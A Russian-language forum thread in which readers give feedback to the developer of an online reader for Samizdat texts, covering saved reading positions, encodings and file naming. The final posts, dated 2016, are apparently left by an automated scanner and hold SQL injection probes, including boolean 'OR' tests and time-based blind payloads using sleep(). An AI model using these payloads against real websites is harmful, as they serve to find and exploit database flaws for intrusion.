Форум "Прочиталка"

АвторСообщение
40OIL
Добавлено: 01-10-2010 06:58

Я понимаю что запросы у меня примерно как у наших бухов (они мне обычно говорят "сделай, чтоб я нажала - и у меня высветило" ;-) ), но все равно скажу.

- Слишком много телодвижений приходится делать, если заходишь в книгу из СИ-Линкера. Как только обновится книга - ридер сразу ее открывает на первой странице - а хочется чтоб восстанавливал положение, которое было в предыдущей версии, и не только его, а еще и вид (ну там номер страницы или "Все" ) .
- Часто линкер видит обновление - а ридер не видит, и приходится ручками обновлять загруженное; да до того чтоб ручками обновить еще ведь додуматься надо!
Я конечно понимаю что авторы у ридера и линкера разные - но ведь можно договориться и например в URL параметр передавать какой, чтоб ридер видел, что книгу надо принудительно обновить!
Gorby
Добавлено: 01-10-2010 13:13

40OIL писал(а):

- Часто линкер видит обновление - а ридер не видит, и приходится ручками обновлять загруженное; да до того чтоб ручками обновить еще ведь додуматься надо!
Я конечно понимаю что авторы у ридера и линкера разные - но ведь можно договориться и например в URL параметр передавать какой, чтоб ридер видел, что книгу надо принудительно обновить!
Вы немного забегаете вперед. Синхронизация линкеров через сайт Прочиталки в планах, тогда ридер и будет знать об обновлениях, тогда и можно будет сделать автоматическую загрузку обновленной версии. Пока каждый сам по себе ситуация будет примерно такая: 10:22 мой линкер нашел обновление у Величко (скажем), в 10:25 я полез его читать, Прочиталка обновила файл, записала состояние 10:25. В 10:32 Ваш линкер нашел обновление у Величко, в 10:40 вы его полезли читать, Ваш линкер передал время обновления 10:32, Прочиталка _снова_ обновит файл, ибо 10:25<10:32
Решить такую ситуацию можно только одним способом, если Прочиталка будет хранить те же хеши, что сейчас в базе линкера, тогда она сможет получая сигнал об обновлении решать, новое это обновление, или чей-то линкер немного запоздал.
Повторю, все это есть в планах, будет реализовано со временем. Пока линкеру бы из стадии бета-версии бы выйти ;-)
Элжа
Добавлено: 02-10-2010 08:32

40OIL писал(а):
Я понимаю что запросы у меня примерно как у наших бухов (они мне обычно говорят "сделай, чтоб я нажала - и у меня высветило" ;-) ), но все равно скажу.
Ну, зачем же к себе так строго?
Да и вообще, хотелки - самый главный двигатель прогресса, а потому, призываю всех хотеть больше и чаще

40OIL писал(а):

- Слишком много телодвижений приходится делать, если заходишь в книгу из СИ-Линкера. Как только обновится книга - ридер сразу ее открывает на первой странице - а хочется чтоб восстанавливал положение, которое было в предыдущей версии, и не только его, а еще и вид (ну там номер страницы или "Все" ) .
Хммм, специально сейчас зашла проверить, вроде бы он так и делает.
И не только при открытии из Си-Линкера, но и вообще при открытии любой книги, которая уже раньше читалась.
Не важно каким способом открывать, хоть Линкером, хоть через ссылку или через формочку на страничке.
Одно "Но". Нужно, чтобы книга была добавлена в Прочиталке в "Избранное", тогда инфа, о текущей странице сохраняется в БД. А если произведение не "избранное", то пытается сохранить в сессиях. Но сессии вещь не очень надежная, идентификатор и поменяться может.
Если не трудно, уточните пожалуйста, какие произведения вы открывали, "избранные" или нет? И если не избранные, то всегда ли Прочиталка открывает текст на первой странице или иногда все таки запоминает правильно ?


40OIL писал(а):

- Часто линкер видит обновление - а ридер не видит, и приходится ручками обновлять загруженное; да до того чтоб ручками обновить еще ведь додуматься надо!
Я конечно понимаю что авторы у ридера и линкера разные - но ведь можно договориться и например в URL параметр передавать какой, чтоб ридер видел, что книгу надо принудительно обновить!
Как уже сказал Gorby - в планах есть
40OIL
Добавлено: 02-10-2010 19:05

Элжа писал(а):
Если не трудно, уточните пожалуйста, какие произведения вы открывали, "избранные" или нет? И если не избранные, то всегда ли Прочиталка открывает текст на первой странице или иногда все таки запоминает правильно ?
Конечно открывал не избранные - я до вашего ответа не видел смысла там что-то держать ;-)
А "всегда-ли" - посмотрю, поюзаю...
40OIL
Добавлено: 02-10-2010 23:30

Элжа писал(а):
всегда ли Прочиталка открывает текст на первой странице
Вот прям сейчас - добавил буквально пару часов назад Величко "Пятая книга" в избранное, только что автопроверка линкера мне сказала что оно обновилось, открыл в прочиталке - открылось как раз на первой странице.
Как будет дальше - будем посмотреть...
Элжа
Добавлено: 04-10-2010 01:51

40OIL писал(а):
Элжа писал(а):
всегда ли Прочиталка открывает текст на первой странице
Вот прям сейчас - добавил буквально пару часов назад Величко "Пятая книга" в избранное, только что автопроверка линкера мне сказала что оно обновилось, открыл в прочиталке - открылось как раз на первой странице.
Как будет дальше - будем посмотреть...
Если в Избранном есть, то должно перейти к последней прочитанной странице.
Кроме запоминания последней страницы в Избранном еще и сортировка производится по дате последнего обновления (т.е. все свежеобновленные произведения сверху будут), ну и обновлять оттуда удобно, нажатием одной кнопки прямо в списке произведений.
40OIL
Добавлено: 04-10-2010 06:50

Элжа писал(а):
Если в Избранном есть, то должно перейти к последней прочитанной странице.
Вчера и сегодня обновилось несколько книг, которые у меня в избранном прочиталки - при открытии из линкера все равно открывает на первой странице.
Элжа
Добавлено: 04-10-2010 08:41

40OIL писал(а):
Элжа писал(а):
Если в Избранном есть, то должно перейти к последней прочитанной странице.
Вчера и сегодня обновилось несколько книг, которые у меня в избранном прочиталки - при открытии из линкера все равно открывает на первой странице.
Хммм. Странно...

Если не против, давайте проведем небольшой эксперимент.
1. Необходимо залогиниться. (при входе в личный кабинет "ключики" - должна отображаться панель кабинета Здравствуйте: 40OIL (Выйти из системы) У Вас в избранных произведениях: ??)
2. Открыть какое-нибудь произведение из списка Избранного и перейти на любую страницу в его середине. Запомнить страницу.
3. Открыть другое произведение и тоже куда-нибудь перейти.
4. Опять открыть предыдущее произведение. (оно должно открыться на той странице, которая была открыта ранее)
5. Попробовать открыть второе произведение.
Открывать произведения можно как из списка избранного, так и через СИ-Линкер или любым другим способом.

В общем, по идее, должно работать. У меня 54 произведения в списке и всегда открывает на последней прочтенной странице.

Есть подозрение, что возможно вы не залогинились. (У незалогиненных тоже можно произведения в избранное добавлять, но не более 10 штук. потом будет просьба залогиниться/зарегаться и произведения в основной список переместятся)

П.С.
В ближайшее время сделаю нормальную индикацию состояния зареган/не зареган пользователь
40OIL
Добавлено: 04-10-2010 21:48

Провел предложенные манипуляции. Выяснил следующее - если перейти именно на страницу - то возвращается; но я же выбираю "все", и жду что откроется именно страница "все", и сохранится положение текста в ней - а именно этого и нет.

Если бы "страница" динамически изменялась и соответствовала экрану - тогда бы можно и на ней почитать - а так в них я как-то мало смысла вижу (только лишние телодвижения), и соответственно читаю в режиме "все"...
Элжа
Добавлено: 05-10-2010 00:05

40OIL писал(а):
Провел предложенные манипуляции. Выяснил следующее - если перейти именно на страницу - то возвращается; но я же выбираю "все", и жду что откроется именно страница "все", и сохранится положение текста в ней - а именно этого и нет.

Если бы "страница" динамически изменялась и соответствовала экрану - тогда бы можно и на ней почитать - а так в них я как-то мало смысла вижу (только лишние телодвижения), и соответственно читаю в режиме "все"...

Теперь понятно в чем проблема
Про позиционирование на страничке "Все" я как то не подумала. Там действительно ничего нету.

Можно жаваскриптом сделать периодическую отсылку текущей позиции на странице. Ну и кнопочку "Запомнить"
Правда от этого статистика на сервере сразу окривеет , ну и фиг с ней
40OIL
Добавлено: 05-10-2010 06:37

Элжа писал(а):
Про позиционирование на страничке "Все" я как то не подумала. Там действительно ничего нету.
Это грустно ;-(

А я предполагал следующее - запоминается положение именно в тексте; "страница" динамически изменяется в соответствии с размером экрана фокса, чтоб на разных компах продолжать читать с того-же места (и чтоб на "странице" все влазило в один экран, в т.ч. и кнопки перехода на следующую/предыдущую); в режиме "все" положение тоже запоминается и восстанавливается; между ними переход тоже обрабатывается (ну там был на какой-то странице, ткнул "все" - открылось то же самое место)...

Еще в порядке хотелок - сильно-ли сложно на жабаскрипте сделать разбор текста, чтоб сравнивать старый и измененный варианты, и при вставке\изменении в середине книги например более какого-то кол-ва символов переходить к этому месту; еще бы иметь возможность переходить между такими местами и сохраненной позицией, и подсветку измененного фрагмента - и все, локальные букридеры можно выкидывать и на Прочиталку переезжать ;-)
mikl628
Добавлено: 07-10-2010 17:45

Хотелось бы чтобы lib.rus.ec и flibusta.net открывались в нормальной кодировке и наименование импортировалось в блокнот
Элжа
Добавлено: 08-10-2010 18:07

Извиняюсь, что долго не отвечала.
Работой завалили
40OIL писал(а):
А я предполагал следующее - запоминается положение именно в тексте; "страница" динамически изменяется в соответствии с размером экрана фокса, чтоб на разных компах продолжать читать с того-же места (и чтоб на "странице" все влазило в один экран, в т.ч. и кнопки перехода на следующую/предыдущую); в режиме "все" положение тоже запоминается и восстанавливается; между ними переход тоже обрабатывается (ну там был на какой-то странице, ткнул "все" - открылось то же самое место)...
Не совсем поняла. В режиме "Все" ведь нету вперед/назад там все одной простыней...
На выходных сделаю запоминание положения на страничке. Пока просто никак

40OIL писал(а):

Еще в порядке хотелок - сильно-ли сложно на жабаскрипте сделать разбор текста, чтоб сравнивать старый и измененный варианты, и при вставке\изменении в середине книги например более какого-то кол-ва символов переходить к этому месту; еще бы иметь возможность переходить между такими местами и сохраненной позицией, и подсветку измененного фрагмента - и все, локальные букридеры можно выкидывать и на Прочиталку переезжать ;-)
На жабаскрипте - это чтобы можно было скрипту дать исходник, чтоб он с текущей версией сравнил?
В принципе без разницы на чем, главное, чтобы алгоритм был. По инету немножко пробежалась, на первый взгляд ничего не нашла. Надо или искать лучше или придумывать что-нить.
В общем подумаю Хорошая идея!!!!
Элжа
Добавлено: 08-10-2010 18:11

mikl628 писал(а):
Хотелось бы чтобы lib.rus.ec и flibusta.net открывались в нормальной кодировке и наименование импортировалось в блокнот
Это можно
Уточните пожалуйста, там кажется есть как открытые, так и закрытые тексты, до которых можно только через пароль добраться?
С открытыми не сложно, а вот с закрытыми что делать?
mikl628
Добавлено: 09-10-2010 09:29

на закрытые можно забить
40OIL
Добавлено: 09-10-2010 19:32

Элжа писал(а):
Не совсем поняла. В режиме "Все" ведь нету вперед/назад там все одной простыней.
Что именно непонятно? поподробнее плиз...

Элжа писал(а):
На жабаскрипте - это чтобы можно было скрипту дать исходник, чтоб он с текущей версией сравнил?
В принципе без разницы на чем, главное, чтобы алгоритм был.
Да мне тоже как-то параллельно на чем, главное чтоб работало правильно!

И еще про идею mikl628 - IMHO стоит не только эти две, а как можно больше онлайн библиотек обрабатывать - не только ведь либрусек и мошкова народ читает...
Элжа
Добавлено: 17-10-2010 19:24

Извиняюсь за долгое отсутствие
Надеюсь, что в ближайшее время так надолго исчезать не буду

Кажется получилось приделать запоминание последнего места чтения в тексте.
Запоминает и на странице "Все" и на отдельных страничках, но на страничках запоминает положение не на каждой, а только на текущей странице.
Сделано на жабаскрипте + кукисы (принудительную отсылку на сервер решила не делать)
Работает все это только для зареганных пользователей.

Ну, вот вроде бы и все
Тестировала в FF, Опере и на IE6. В других браузерах не пробовала, так что если кто, что заметит, то буду признательна за сообщение
Элжа
Добавлено: 17-10-2010 19:27

mikl628, 40OIL
В ближайшее время добавлю нормальное открытие с Флибусты, ну и дальше понемногу
40OIL
Добавлено: 19-10-2010 23:10

Элжа писал(а):
Кажется получилось приделать запоминание последнего места чтения в тексте.
Не "кажется", а именно "получилось"!

Но может все-таки можно сделать так, чтоб размер страницы таки выбирался динамически, в зависимости от размера экрана фокса и моего шрифта? (и если один юзер на разных машинах с разным экраном читает один текст, чтоб восстанавливалось именно положение в тексте, а не что бог на душу положит)... и служебную область вверху поменьше... и внизу ссылки на следующую/предыдущую тоже......

И еще - у книг не добавленных в Избранное мой выбранный шрифт не применяется - оно так и должно быть?
Вообще какая разница между избранными и всеми прочими книгами?
Элжа
Добавлено: 22-10-2010 22:22

40OIL писал(а):
Но может все-таки можно сделать так, чтоб размер страницы таки выбирался динамически, в зависимости от размера экрана фокса и моего шрифта? (и если один юзер на разных машинах с разным экраном читает один текст, чтоб восстанавливалось именно положение в тексте, а не что бог на душу положит)...
Вообще-то именно на это (восстановление позиции при любом разрешении, браузере, шрифте) я основное внимание и обращала.
И вроде бы все работает. Погрешность конечно есть но в пределах +-3-5 строк должно восстанавливаться.
Погрешность вылезает из-за разного способа рассчета размера клиентской области в разных браузерах, а также из-за того, что привязка осуществляется не к смещению относительно начала текста/страницы, а к проценту, на который прокручен текст от его начала.
Привязатьтся к точному смещению в байтах автоматически не получается
Нужно, как минимум, чтобы пользователь выделил участок текста и дал команду, на запоминание позиции. Но тогда не будет работать автосохранение позиции.

Еще, ситуация, когда текст открывается не там где нужно, может возникнуть если пользователь начал читать текст в одном браузере, потом закрыл его крестиком и открыл этот же текст в другой браузере.

В таком случае предыдущая позиция не сохранится, потому что передача данных позиции на сервер происходит при помощи куков, т.е. нужно открыть любую книжку и только тогда позиция по предыдущему тексту запишется в БД.

40OIL писал(а):
и служебную область вверху поменьше... и внизу ссылки на следующую/предыдущую тоже......
Верхняя служебная область уменьшается при помощи синей кгопочки со стрелочками в верхнем левом углу экрана "севернуть/развернуть".
Насчет ссылок следующую/предыдущую опять не поняла
Они же на каждой странице имеются и вверху текста и внизу.

40OIL писал(а):
И еще - у книг не добавленных в Избранное мой выбранный шрифт не применяется - оно так и должно быть?
Вообще какая разница между избранными и всеми прочими книгами?
Наличие книги в Избранном на применение цвета, шрифта и т.д. никак не влияет.
Должно работать на любом тексте. Главное, чтобы пользователь был залогинен.
40OIL
Добавлено: 22-10-2010 23:58

Элжа писал(а):
Вообще-то именно на это (восстановление позиции при любом разрешении, браузере, шрифте) я основное внимание и обращала.
И вроде бы все работает. Погрешность конечно есть но в пределах +-3-5 строк должно восстанавливаться.
см. шот на http://ipicture.ru/uploads/101022/feV4W55T6x.png
открываю в фоксе 3.6.11 - одна страница занимает примерно 5-6 экранов, на шоте по скроллбару видно; восстаонвление работает, но сильно-сильно хоцца чтоб "1 страница" = "1 экран" - а иначе IMHO как-то непонятным становится смысл этого самого разделения на страницы... я более про это и писал в предыдущем посте, а не про восстановление положения, оно уже более-менее нормально работает...

Элжа писал(а):
Насчет ссылок следующую/предыдущую опять не поняла
Они же на каждой странице имеются и вверху текста и внизу.
да, имеются; а можно их как-нить не основным шрифтом, а помельче... чтоб текста поболе входило? или там такими-же маленькими кнопульками, как в шапке...

Элжа писал(а):
Верхняя служебная область уменьшается при помощи синей кгопочки
уже заметил, сорри :-[

Элжа писал(а):
Наличие книги в Избранном на применение цвета, шрифта и т.д. никак не влияет.
Должно работать на любом тексте. Главное, чтобы пользователь был залогинен.
пару раз было - открываешь из ридера книжку (не из избранного прочиталки), восстанавливается положение, потом переходишь на след.страницу - хоп, а шрифт слетел в положение "по умолчанию"... вроде был залогинен...
Элжа
Добавлено: 23-10-2010 16:50

40OIL писал(а):
см. шот на http://ipicture.ru/uploads/101022/feV4W55T6x.png
открываю в фоксе 3.6.11 - одна страница занимает примерно 5-6 экранов, на шоте по скроллбару видно; восстаонвление работает, но сильно-сильно хоцца чтоб "1 страница" = "1 экран" - а иначе IMHO как-то непонятным становится смысл этого самого разделения на страницы... я более про это и писал в предыдущем посте, а не про восстановление положения, оно уже более-менее нормально работает...
ааа. вон в чем дело
Разделение на страницы происходит примерно по 30Кб (кроме первой странички 5Кб). Примерно, потому что прочиталка старается разделить их по абзацам.
Сделано все это, что бы можно было не закачивая весь текст в браузер, открыть книжку примерно там, где юзер закончил читать или началась свежая прода.
Выводить же "1 страница" = "1 экран" не получится
Слишком много всяких неизвестных условий. Размер окна браузера, особенности отображения текста разными браузерами, тот же размер и тип шрифта (особенно если шрифт не моноширинный). В общем жуть...
Единственное, что можно сделать - это добавить кнопочки Вверх/Вниз, которые будут пролистывать уже загруженный текст на высоту экрана.

40OIL писал(а):
Элжа писал(а):
Насчет ссылок следующую/предыдущую опять не поняла
Они же на каждой странице имеются и вверху текста и внизу.
да, имеются; а можно их как-нить не основным шрифтом, а помельче... чтоб текста поболе входило? или там такими-же маленькими кнопульками, как в шапке..
Это можно


40OIL писал(а):
пару раз было - открываешь из ридера книжку (не из избранного прочиталки), восстанавливается положение, потом переходишь на след.страницу - хоп, а шрифт слетел в положение "по умолчанию"... вроде был залогинен...
По всей видимости - это страничка ранее успела со старым шрифтом закешироваться. А какой у Вас браузер?
40OIL
Добавлено: 23-10-2010 22:47

Элжа писал(а):
Выводить же "1 страница" = "1 экран" не получится
Слишком много всяких неизвестных условий.
Ну IMHO единственное на самом деле неизвестное (точнее получаемое долго и эмпирически) - особенности работы браузеров; все остальное можно получить через API или посчитать...
Ну ладно, "умерла так умерла" (с)...

Элжа писал(а):
Единственное, что можно сделать - это добавить кнопочки Вверх/Вниз, которые будут пролистывать уже загруженный текст на высоту экрана.
с этим и кнопка "пробел" неплохо справляется, так что не надо

Элжа писал(а):
По всей видимости - это страничка ранее успела со старым шрифтом закешироваться. А какой у Вас браузер?
может быть, может быть... хотя где и как успела закешироваться, если я на этой страничке ни разу не был?
а браузер - фокс 3.6.11 (неужто можно еще к какому-нить си-линкер прикрутить?)
Элжа
Добавлено: 25-10-2010 16:27

40OIL писал(а):
Ну ладно, "умерла так умерла" (с)...
Ну и пусть спит спокойно

40OIL писал(а):
Элжа писал(а):
По всей видимости - это страничка ранее успела со старым шрифтом закешироваться. А какой у Вас браузер?
может быть, может быть... хотя где и как успела закешироваться, если я на этой страничке ни разу не был?
а браузер - фокс 3.6.11 (неужто можно еще к какому-нить си-линкер прикрутить?)
А может быть Вы чем-нибудь еще, кроме FF пользовались
Просто никаких других вариантов придумать не могу. Она тупо читает профиль пользователя и ставит из него настройки экрана.
Поэтому варианта только два. Или она не смогла прочитать профиль (пользователь не залогинен) или страничка взялась из кэша.
40OIL
Добавлено: 28-10-2010 23:44

Попробовал сегодня загрузить файло с http://lib.ololo.cc/b/169999/read (аналог либрусека) - непонятно как вы умудрились с кодировками так пролететь...
На одной странице и CP1251 и юникод одновременно - это жестоко... ;-)
Элжа
Добавлено: 29-10-2010 00:00

40OIL писал(а):
Попробовал сегодня загрузить файло с http://lib.ololo.cc/b/169999/read (аналог либрусека) - непонятно как вы умудрились с кодировками так пролететь...
На одной странице и CP1251 и юникод одновременно - это жестоко... ;-)
Все намного печальнее
В данный момент кодировка вообще никак не определяется, а ставится везде 1251

Торжественно обещаю исправиться!!!!
40OIL
Добавлено: 04-11-2010 12:09

Еще почто-то состояние кнопки "Свернуть" не сохраняется... между моими домашним и рабочим компом... если только с домашнего ходить - нормально работает...

И в Избранном/Прочитанном хоцца сортировки... хотя бы по дате добавления, обновления, автору и названию...
40OIL
Добавлено: 06-11-2010 17:43

Сегодня еще заметил такое. Был пару дней назад в книге, на номерной странице; сегодня она обновилась; открываю - там текст который еще не видел; ну ладно думаю, что-то автор удалил; захожу на предыдущую страницу,- там знакомый текст; опять на следующую - а там совсем другой текст, продолжение предыдущей страницы - но не то, что я видел когда открылось сохраненное место...
Интересно как такое могло образоваться?...
Элжа
Добавлено: 26-11-2010 14:44

Извиняюсь за долгое отсутствие.
Теперь буду появляться чаще

40OIL писал(а):
Сегодня еще заметил такое. Был пару дней назад в книге, на номерной странице; сегодня она обновилась; открываю - там текст который еще не видел; ну ладно думаю, что-то автор удалил; захожу на предыдущую страницу,- там знакомый текст; опять на следующую - а там совсем другой текст, продолжение предыдущей страницы - но не то, что я видел когда открылось сохраненное место...
Интересно как такое могло образоваться?...
Сложно сказать... А то место, которое открылось в первый раз, оно потом где-то дальше было, на следующей страничке?

40OIL писал(а):
Еще почто-то состояние кнопки "Свернуть" не сохраняется... между моими домашним и рабочим компом... если только с домашнего ходить - нормально работает...
Буду разбираться. Спасибо!
40OIL писал(а):
И в Избранном/Прочитанном хоцца сортировки... хотя бы по дате добавления, обновления, автору и названию...
Ок. Подумаю как все это лучше сделать

40OIL писал(а):
Попробовал сегодня загрузить файло с http://lib.ololo.cc/b/169999/read (аналог либрусека) - непонятно как вы умудрились с кодировками так пролететь...
На одной странице и CP1251 и юникод одновременно - это жестоко... ;-)
Юникодовские странички теперь автоперекодируются в 1251. Заодно и размер текста при этом уменьшается.
В ближайшее время надеюсь сделать полную поддержку lib.ololo.cc, либрусека и т.д.
40OIL
Добавлено: 01-12-2010 07:14

Элжа писал(а):
40OIL писал(а):
Сегодня еще заметил такое. Был пару дней назад в книге, на номерной странице; сегодня она обновилась; открываю - там текст который еще не видел; ну ладно думаю, что-то автор удалил; захожу на предыдущую страницу,- там знакомый текст; опять на следующую - а там совсем другой текст, продолжение предыдущей страницы - но не то, что я видел когда открылось сохраненное место...
Интересно как такое могло образоваться?...
Сложно сказать... А то место, которое открылось в первый раз, оно потом где-то дальше было, на следующей страничке?
Было, было. Я уже понял, что просто прошла вставка автором нового куска текста в середину; такое уже не раз видел.
На такой случай я и хотел сравнение текстов, выделение изменений и переход между ними по кнопке...

Элжа писал(а):
В ближайшее время надеюсь сделать полную поддержку lib.ololo.cc, либрусека и т.д.
Наипочтительнейше ждем-с... ;-)
RMarauder
Добавлено: 20-12-2010 14:46

Добавлю и мою хотелку,
было бы очень интересно увидеть в списке "Что читают на ..." против каждой книжки, сколько именно человек её читало/читает/занесло в избранное. Полчится такой себе топ-Хть.
Элжа
Добавлено: 24-12-2010 15:50

RMarauder писал(а):
Добавлю и мою хотелку,
было бы очень интересно увидеть в списке "Что читают на ..." против каждой книжки, сколько именно человек её читало/читает/занесло в избранное. Полчится такой себе топ-Хть.
Можно попробовать.
С занесением в избранное ничего сложного, а вот с количеством читающих сложнее.
Надо думать как сделать чтобы нагрузка не сильно выросла.
40OIL
Добавлено: 31-12-2010 17:18

Еще такой момент - кнопка Обновить в "полном варианте" интерфейса плавает по положению в зависимости от текста (там размер файла рисуется, а уж после него кнопка). Если между несколькими табами переключаться, и все подряд обновлять - неудобно, надо мышь дергать. Может стоит ее поместить например в заголовок? или там в начало строки?...

И еще - "свернутое" состояние заголовка перестало сохраняться совсем.

Сохранение из либрусека и прочих любой книги идет в файл " .zip" - это так и задумано?
Элжа
Добавлено: 31-12-2010 22:57

40OIL писал(а):
Еще такой момент - кнопка Обновить в "полном варианте" интерфейса плавает по положению в зависимости от текста (там размер файла рисуется, а уж после него кнопка). Если между несколькими табами переключаться, и все подряд обновлять - неудобно, надо мышь дергать. Может стоит ее поместить например в заголовок? или там в начало строки?...
Если кнопочку перетащить в другое место, то логика теряется
Ну, как бы, вначале указываеися размер файла, затем его дата, ну а потомом уже кнопочка для обновления

40OIL писал(а):
И еще - "свернутое" состояние заголовка перестало сохраняться совсем.
Спасибо! На новогодних праздниках обязательно поправлю

40OIL писал(а):
Сохранение из либрусека и прочих любой книги идет в файл " .zip" - это так и задумано?
Да. Все в зипах, для уменьшения размера.
Без зипа можно ведь и без прочиталки с сайта скачать


Всех С Наступившим!!!!!! Ураааа!!!!!!!!!!! )
40OIL
Добавлено: 02-01-2011 21:13

Элжа писал(а):
40OIL писал(а):
Еще такой момент - кнопка Обновить в "полном варианте" интерфейса плавает по положению в зависимости от текста...
Если кнопочку перетащить в другое место, то логика теряется
Ну, как бы, вначале указываеися размер файла, затем его дата, ну а потомом уже кнопочка для обновления
А кто помнит эти размеры-даты? Мне вот в сутки линкер приносит 5-20 обновлений, так я просто открываю их все в прочиталке, а потом переключаясь между закладками обновляю все подряд, ибо так проще (до тех пор, пока линкер не станет в прочиталку отдавать время обновления, и обновляться текст не начнет сам, автоматом). И на запоминание даты-времени изменения у меня не хватает оперативной памяти ;-)

Элжа писал(а):
40OIL писал(а):
Сохранение из либрусека и прочих любой книги идет в файл " .zip" - это так и задумано?
Да. Все в зипах, для уменьшения размера.
Без зипа можно ведь и без прочиталки с сайта скачать

Я имел в виду, что любая книга сохраняется с именем " .zip" (пробел точка zip). И сортировать/переименовывать их поднадоедает...
Нормально сохраняется только из Самиздата.
Элжа
Добавлено: 14-03-2011 22:00

Ну, раз уж выдернули меня люди добрые в сеть, то грех и на родной форум не зайти

Уже в который раз приношу извинения за долгое отсутствие, молчание и ничегонеделание. Прошу подождать еще около месяца и тогда надеюсь все наладится

40OIL писал(а):

Элжа писал(а):
40OIL писал(а):
Сохранение из либрусека и прочих любой книги идет в файл " .zip" - это так и задумано?
Да. Все в зипах, для уменьшения размера.
Без зипа можно ведь и без прочиталки с сайта скачать

Я имел в виду, что любая книга сохраняется с именем " .zip" (пробел точка zip). И сортировать/переименовывать их поднадоедает...
Нормально сохраняется только из Самиздата.
Теперь поняла.
Частично исправлено. Отдает файл конечно не так как от Самиздата, но все таки лучше, чем просто точка в имени.
Пока так.
40OIL
Добавлено: 09-03-2012 09:36

Доброго утра, глубокоуважаемая Элжа! Мои поздравления с недавно прошедшим праздником, и наилучшими пожеланиями!

Раз уж Линкер окончательно загнулся, может есть возможность/желание реализовать часть его функционала в Прочиталке?
Например в "Избранное"\"Недавно прочитанное" сделать отбор по времени обновления ("красный new"-"желтый"-...-все) (чтоб не пролистывать 100500 страниц в поисках новых), плюс отбор тех книг, что обновились со времени последнего визита пользователя (может я месяц не заходил, а new показывает гораздо меньший интервал).

Это "программа минимум", а если по максимуму - так мне лично больше всего доставляет, что нельзя штатными средствами тыцнуть на ссылке ПКМ, и выбрать "открыть в Прочиталке", как было в Линкере (ну или там рядом со ссылкой кнопку такую динамически создавать, как скайп рядом с номерами телефонов); и что нет нигде автопроверки отобранных авторов на предмет новых книг, причем не только в Самиздате, а например на Флибусте...
Если бы все это реализовать, цены бы не было такому сервису...
kentaskis
Добавлено: 12-09-2014 11:36

Есть кто дома?
tsclumfx
Добавлено: 28-07-2016 04:07

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:16

1'"
tsclumfx
Добавлено: 28-07-2016 04:16

\
tsclumfx
Добавлено: 28-07-2016 04:16

1А§Аў
tsclumfx
Добавлено: 28-07-2016 04:16

@@ascVQ
tsclumfx
Добавлено: 28-07-2016 04:16

JyI=
tsclumfx
Добавлено: 28-07-2016 04:16

ї'ї"
tsclumfx
Добавлено: 28-07-2016 04:16

р''р""
tsclumfx
Добавлено: 28-07-2016 04:16

(select convert(int,CHAR(65)))
tsclumfx
Добавлено: 28-07-2016 04:16

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

1
tsclumfx
Добавлено: 28-07-2016 04:17

ZGE28Yhr
tsclumfx
Добавлено: 28-07-2016 04:17

-1 OR 2+799-799-1=0+0+0+1 --
tsclumfx
Добавлено: 28-07-2016 04:17

-1 OR 2+798-798-1=0+0+0+1
tsclumfx
Добавлено: 28-07-2016 04:17

-1' OR 2+920-920-1=0+0+0+1 --
tsclumfx
Добавлено: 28-07-2016 04:17

-1" OR 2+183-183-1=0+0+0+1 --
tsclumfx
Добавлено: 28-07-2016 04:17

if(now()=sysdate(),sleep(12),0)/*'XOR(if(now()=sysdate(),sleep(12),0))OR'"XOR(if(now()=sysdate(),sleep(12),0))OR"*/
tsclumfx
Добавлено: 28-07-2016 04:17

(select(0)from(select(sleep(18)))v)/*'+(select(0)from(select(sleep(18)))v)+'"+(select(0)from(select(sleep(18)))v)+"*/
tsclumfx
